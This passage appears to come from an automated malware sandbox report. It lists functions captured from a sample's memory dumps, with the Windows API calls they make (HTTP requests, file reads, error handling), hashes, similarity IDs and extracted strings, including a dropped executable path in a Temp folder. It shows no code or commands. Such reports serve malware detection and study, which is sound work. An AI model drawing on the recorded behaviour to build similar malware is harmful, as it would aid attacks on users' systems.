                                                                                                                                            • Instruction Fuzzy Hash: C0F08671A00218A6DB00FF9BD846B9D7BB59B44308FA4452DF504331C2DBBC655487E9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004110B8,?,?,00411080,00403AF0,73B76490,?), ref: 004110D8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004110EB
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,004110B8,?,?,00411080,00403AF0,73B76490,?), ref: 0041110E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                            • Opcode ID: b37e2a0355cf052c7e7e456c1e71d6e36bed1f43a61ca4eb637a0100914bca8f
                                                                                                                                            • Instruction ID: 89d1d6a6511906fb8b10b3cdba021d603bd2b1b5d6d269f4ed68b4bcbc4a5649
                                                                                                                                            • Opcode Fuzzy Hash: b37e2a0355cf052c7e7e456c1e71d6e36bed1f43a61ca4eb637a0100914bca8f
                                                                                                                                            • Instruction Fuzzy Hash: 94F0A730B00228FBCB21DB60EC09BDFBA78EF04756F520075FA00A1160DB758E01EB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 73be664fff36d98fdd81bda417fd82615685bcef4b50de6d5a22a18df7e17d5e
                                                                                                                                            • Instruction ID: 8ad3bd46f8fc93b03bdac7becc6b786467c7e940b91d4c94c9cad7c6d1f98ebd
                                                                                                                                            • Opcode Fuzzy Hash: 73be664fff36d98fdd81bda417fd82615685bcef4b50de6d5a22a18df7e17d5e
                                                                                                                                            • Instruction Fuzzy Hash: EE02D670E10228ABEF14EFE8C844BDD7BB6EF04304F504458E81567299DB76A68DCF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 597776487-0
                                                                                                                                            • Opcode ID: 43ee30c7ba166d1e1025ba4d1c2ab3c94bbe7b0064d6f6931672a8035e95404c
                                                                                                                                            • Instruction ID: e867acc3524ab95d796c35b399e3f2405890e2f1440d4cc8dacfedfacdc9b18a
                                                                                                                                            • Opcode Fuzzy Hash: 43ee30c7ba166d1e1025ba4d1c2ab3c94bbe7b0064d6f6931672a8035e95404c
                                                                                                                                            • Instruction Fuzzy Hash: C8C149F1A243459FDB26DFF8CC40BEA7BBAAF45314F5440AAD8859724CE7309A46CB50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetVersionExW.KERNEL32(0000011C,?,?,?), ref: 00403C86
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            • Opcode ID: 3731c6bde117b935816b01578708b883aad1c120ed38ca2891ce69254066a0a2
                                                                                                                                            • Instruction ID: fc88b0bca923a07532a6eb78641dceaa207a15a50886e6470e9b438ae10ccdb1
                                                                                                                                            • Opcode Fuzzy Hash: 3731c6bde117b935816b01578708b883aad1c120ed38ca2891ce69254066a0a2
                                                                                                                                            • Instruction Fuzzy Hash: 3E61E271E092089BEB20DF69DC457ADBBB9EB05316F5002BBD804A73C0E7794A8487C9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02231985), ref: 02231A75
                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 02231ACF
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02231985,?,000000FF,00000000,00000000), ref: 02231B5D
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02231B64
                                                                                                                                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 02231BA1
                                                                                                                                              • Part of subcall function 02231DC9: __dosmaperr.LIBCMT ref: 02231DFE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1206951868-0
                                                                                                                                            • Opcode ID: a23d261a52b5f9b846104edee53f27537c0404e818dce516698b2e32cd5f43d1
                                                                                                                                            • Instruction ID: 056466e2acf429311ab3115004bd0d010ae41c56bdb3c7fc7e653fb89dea8aa7
                                                                                                                                            • Opcode Fuzzy Hash: a23d261a52b5f9b846104edee53f27537c0404e818dce516698b2e32cd5f43d1
                                                                                                                                            • Instruction Fuzzy Hash: 03414EB5910305AFDB25DFE9DC449EBBBFAEF49300B00852DE85AD3614E7309955CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0041B6DE
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041B6F0
                                                                                                                                            • _free.LIBCMT ref: 0041B702
                                                                                                                                            • _free.LIBCMT ref: 0041B714
                                                                                                                                            • _free.LIBCMT ref: 0041B726
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 72c623a330305ed8c8d887ea2e85d0e1707ef1c6524a41b347e3d58e20e3bcd1
                                                                                                                                            • Instruction ID: a39dbec80042cf7ab2af5a54609ca5fcb94fb6c3dd62ab813c31dfe5020b408c
                                                                                                                                            • Opcode Fuzzy Hash: 72c623a330305ed8c8d887ea2e85d0e1707ef1c6524a41b347e3d58e20e3bcd1
                                                                                                                                            • Instruction Fuzzy Hash: 66F04F32600610A78620FB66F8C5DDB77E9EA84351794580BF098D7642CB38FCC186AC
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: *?
                                                                                                                                            • API String ID: 269201875-2564092906
                                                                                                                                            • Opcode ID: f63c959fec63c638acbb7ef9835275d00cb3544718f5775b9b35536119c19f2a
                                                                                                                                            • Instruction ID: 0e352be0efe34e277c7e4760dbf0677bf23d989de96f83cd80e8d90098d39d98
                                                                                                                                            • Opcode Fuzzy Hash: f63c959fec63c638acbb7ef9835275d00cb3544718f5775b9b35536119c19f2a
                                                                                                                                            • Instruction Fuzzy Hash: 0B615E75E00219AFCF14CFA9C8915EEFBF5EF48314B24816AE815E7340D779AE818B94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: *?
                                                                                                                                            • API String ID: 269201875-2564092906
                                                                                                                                            • Opcode ID: 0a53196b252b46736e61d4d1bcca109f78a400bdedf12c68fddac8ae25f72c85
                                                                                                                                            • Instruction ID: 0f95832da43a73c90672f9ef1fd92755cbb72ee2b8095fb8caec4ecca1266a53
                                                                                                                                            • Opcode Fuzzy Hash: 0a53196b252b46736e61d4d1bcca109f78a400bdedf12c68fddac8ae25f72c85
                                                                                                                                            • Instruction Fuzzy Hash: 5E613CB5E1021A9FCB15DFE8C880AEDFBF5EF48310B24816AD895E7314D775AE418B90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0222FB8F
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0222FC43
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 3480331319-3733052814
                                                                                                                                            • Opcode ID: 0c3c2256af72a61df102aaf674b741db4d987c510a88555500926bfe03ab2711
                                                                                                                                            • Instruction ID: ce1aadfd799c309c3c3b53201d6c7e6930f6ce90ce1166bb4d43d12878f3d672
                                                                                                                                            • Opcode Fuzzy Hash: 0c3c2256af72a61df102aaf674b741db4d987c510a88555500926bfe03ab2711
                                                                                                                                            • Instruction Fuzzy Hash: F251B334A10329EFCF14DFA8C940B6E7BB5EF44314F148159E8155B6A9D772DA0ACFA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (5h$C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                            • API String ID: 0-871336922
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (5h$C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                            • API String ID: 0-871336922
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041A5CE: GetOEMCP.KERNEL32(00000000,0041A840,00417373,00000000,?,?,00000000,?,00417373), ref: 0041A5F9
                                                                                                                                            • _free.LIBCMT ref: 0041A89D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: hdi$ssA
                                                                                                                                            • API String ID: 269201875-1583100127
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,agA), ref: 00416591
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000001,00000000,00000104,00000000,?,?,agA), ref: 004165C4
                                                                                                                                            • _free.LIBCMT ref: 004165E5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectory$_free
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2913637552-2637427811
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00407AB7
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00407AC6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Xinvalid_argumentstd::_
                                                                                                                                            • String ID: invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 909987262-1606216832
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?), ref: 0222486D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 514040917-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 02226083
                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,?), ref: 0222612C
                                                                                                                                            • InternetReadFile.WININET(00000000,?,000003FF,00000010), ref: 022261BD
                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000003FF,?), ref: 02226244
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileHttpInternetReadRequest$OpenSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 947651290-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 004205EE
                                                                                                                                            • _free.LIBCMT ref: 00420617
                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,0041CA05,00000000,?,?,?,?,?,?,?,?,0041CA05,?,00000000), ref: 00420649
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041CA05,?,00000000,?,?,?,?,?), ref: 00420665
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0224083E
                                                                                                                                            • _free.LIBCMT ref: 02240867
                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,0223CC55,00000000,022355AE,?,?,?,?,?,?,?,0223CC55,022355AE,00000000), ref: 02240899
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0223CC55,022355AE,00000000,?,?,?,?,00000000), ref: 022408B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00403F36
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00411547: _free.LIBCMT ref: 00411555
                                                                                                                                              • Part of subcall function 0041AC9B: WideCharToMultiByte.KERNEL32(00403AF0,00000000,0042CEB8,00000000,00403AF0,00403AF0,00417CA7,?,0042CEB8,?,00000000,?,00417A16,0000FDE9,00000000,?), ref: 0041AD3D
                                                                                                                                            • GetLastError.KERNEL32 ref: 00419D2C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00419D33
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00419D72
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00419D79
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 167067550-0
                                                                                                                                            • Opcode ID: 1c3af7858ea50f7c5b5e6d64a6857d60a2eae298f119b56bdb5357b17a8338d4
                                                                                                                                            • Instruction ID: 4d93f7510ca8fb492935d04f0bce4db79238aaac4d275d244a80cacbd3f4cc59
                                                                                                                                            • Opcode Fuzzy Hash: 1c3af7858ea50f7c5b5e6d64a6857d60a2eae298f119b56bdb5357b17a8338d4
                                                                                                                                            • Instruction Fuzzy Hash: 96212B712002057FDB20AF66DC809EBBBACEF44368710461EF919C7251E738ECD08BA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02231797: _free.LIBCMT ref: 022317A5
                                                                                                                                              • Part of subcall function 0223AEEB: WideCharToMultiByte.KERNEL32(02223D40,00000000,0042CEB8,00000000,02223D40,02223D40,02237EF7,?,0042CEB8,?,00000000,?,02237C66,0000FDE9,00000000,?), ref: 0223AF8D
                                                                                                                                            • GetLastError.KERNEL32 ref: 02239F7C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02239F83
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02239FC2
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02239FC9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 167067550-0
                                                                                                                                            • Opcode ID: f624358d235691ce9a0a371fa08fb7bf6c8004fea39919ec22af2019dff57810
                                                                                                                                            • Instruction ID: ae4138f9fecc4b56d559df3bf0cbbdbda8065ce33cc0bcc8d53b79f734cd8320
                                                                                                                                            • Opcode Fuzzy Hash: f624358d235691ce9a0a371fa08fb7bf6c8004fea39919ec22af2019dff57810
                                                                                                                                            • Instruction Fuzzy Hash: B121CBF1624315AF9B22AFE98C80D6BB7AEEF013647008525F958D7158DBB0EC918B50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction ID: 6179c5f18ead6df4d69bc23217c58f710f46e519add7566c9ff640aa946ff8c0
                                                                                                                                            • Opcode Fuzzy Hash: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction Fuzzy Hash: 7121D8B1B61221BBCB339BA49D80B3A766CAF02F64F160160ED25AF194D770D810C5EC
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(00403AF0,00403AF0,C061E850,0041775D,?,00403AF0,0042CEB8,?,00417C1C,00403AF0,73B76490,00403AF0,00403AF0,00403AF0,73B76490,0040D323), ref: 00415DB7
                                                                                                                                            • _free.LIBCMT ref: 00415E14
                                                                                                                                            • _free.LIBCMT ref: 00415E4A
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000008,000000FF,?,00417C1C,00403AF0,73B76490,00403AF0,00403AF0,00403AF0,73B76490,0040D323,?,00411385,0040D323,0042CEB8), ref: 00415E55
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: a821c2ecde716aeb3cb1a7330a248f4fb163069998c81411724b0173f427264f
                                                                                                                                            • Instruction ID: 21afd909f4b194fd6210441988fb04bb61b69f96b30193ecae22d5dba2614194
                                                                                                                                            • Opcode Fuzzy Hash: a821c2ecde716aeb3cb1a7330a248f4fb163069998c81411724b0173f427264f
                                                                                                                                            • Instruction Fuzzy Hash: ED11EB31700A11EA9620377A6C85EEB255587C0779776413FF538862D1ED7D8CD7412C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,02231715,?,?,?,?,02232382,?), ref: 02236007
                                                                                                                                            • _free.LIBCMT ref: 02236064
                                                                                                                                            • _free.LIBCMT ref: 0223609A
                                                                                                                                            • SetLastError.KERNEL32(00000000,0042E0F8,000000FF,?,?,02231715,?,?,?,?,02232382,?), ref: 022360A5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: ce625cf24dc58ea9de07f82b5e61b0c3359b06124770d73b9dea0357b3156acb
                                                                                                                                            • Instruction ID: f65755cb303ee9228b51fe060b4fc37b909bdf415a7aade9cef7ea2e50bf716e
                                                                                                                                            • Opcode Fuzzy Hash: ce625cf24dc58ea9de07f82b5e61b0c3359b06124770d73b9dea0357b3156acb
                                                                                                                                            • Instruction Fuzzy Hash: 3511E3B2730322BAD63367F55C85A7B256EABC13757750234E238821DCEEB28817852C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(0040D31C,0040D31C,E80042EF,004120CC,004159ED,?,?,0040EBD3,0040D31C,?,0040DD48,E80042F0,73B76490), ref: 00415F0E
                                                                                                                                            • _free.LIBCMT ref: 00415F6B
                                                                                                                                            • _free.LIBCMT ref: 00415FA1
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,0040EBD3,0040D31C,?,0040DD48,E80042F0,73B76490), ref: 00415FAC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: e7281fd609c3106c0c909929b7942df858ff2c5a866c7265aef8ad6113a521fa
                                                                                                                                            • Instruction ID: d0dcc7bb336abb701bcc015160c95cfd1d415a4e49015081c077152140e836e3
                                                                                                                                            • Opcode Fuzzy Hash: e7281fd609c3106c0c909929b7942df858ff2c5a866c7265aef8ad6113a521fa
                                                                                                                                            • Instruction Fuzzy Hash: DA112C31304911EAE610267A5C81EEB2659CBC0378776023EF438822D1EE7DCCD7812C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction ID: b46ce47f677d4acb84ae09198256403967eeabbd5c2bd97b27302a095c3422a1
                                                                                                                                            • Opcode Fuzzy Hash: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction Fuzzy Hash: C4119AB1F65222ABCB334BE8DC44B7A7754BF017A4B110121E915A7194D7B0EE01C7F4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,022369B1,00000000,?,0223D315,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 02236862
                                                                                                                                            • GetLastError.KERNEL32(?,0223D315,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,022369B1,00000000,00000104,?), ref: 0223686C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02236873
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2398240785-0
                                                                                                                                            • Opcode ID: 750d90e04018309d6e3ce2e80e93ff16eb5e1b86fb368af3d40798a4c1480b2f
                                                                                                                                            • Instruction ID: 5fef0073a15a426860b69ab2a1f38fca6a30455ce91ff16718fa69de4e3a17ad
                                                                                                                                            • Opcode Fuzzy Hash: 750d90e04018309d6e3ce2e80e93ff16eb5e1b86fb368af3d40798a4c1480b2f
                                                                                                                                            • Instruction Fuzzy Hash: 29F06271610116BB8B221BE6CC0896AFF6DFF496A03414521A918C7124D732E821CFD8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,022369B1,00000000,?,0223D2A0,00000000,00000000,022369B1,?,?,00000000,00000000,00000001), ref: 022368CB
